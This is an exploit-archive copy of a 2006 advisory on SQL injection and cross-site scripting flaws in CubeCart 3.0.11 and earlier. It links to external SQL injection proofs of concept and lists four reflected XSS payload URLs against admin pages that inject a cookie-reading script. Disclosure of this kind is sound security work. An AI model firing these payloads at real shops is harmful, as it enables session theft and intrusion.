Advertisement






CubeCart <= 3.0.11 SQL injection & cross site scripting

CVE Category Price Severity
CWE-89 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2006-08-25
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080138

Below is a copy:

------------------------------------------------------------------------
--------

CubeCart <= 3.0.11 SQL injection & cross site scripting

software:

site: http://www.cubecart.com/site/home/

description: "CubeCart is an eCommerce script written with PHP & MySQL. With

CubeCart you can setup a powerful online store as long as you have hosting

supporting PHP and one MySQL database."

------------------------------------------------------------------------
--------

i) sql injection:

poc exploit and explaination here:

http://retrogod.altervista.org/cubecart_3011_sql_mqg_bypass.html

and here:

http://retrogod.altervista.org/cubecart_3011_sql.html

the issue could affect other payment modules in modules/gateway/ folder

ii) multiple xss:

http://[target]/[path_to_cubecart]/admin/filemanager/preview.php?file=">
<script>alert(document.cookie)</script>

http://[target]/[path_to_cubecart]/admin/filemanager/preview.php?file=1&
x="><script>alert(document.cookie)</script>

http://[target]/[path_to_cubecart]/admin/filemanager/preview.php?file=1&
y="><script>alert(document.cookie)</script>

http://[target]/[path_to_cubecart]/admin/login.php?email="><script>alert
(document.cookie)</script>

------------------------------------------------------------------------
--------

rgod                                                           17/08/20067.15.36

site: http://retrogod.altervista.org

mail: rgod at autistici.org

original advisory: http://retrogod.altervista.org/cubecart_3011_adv.html

------------------------------------------------------------------------
--------

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum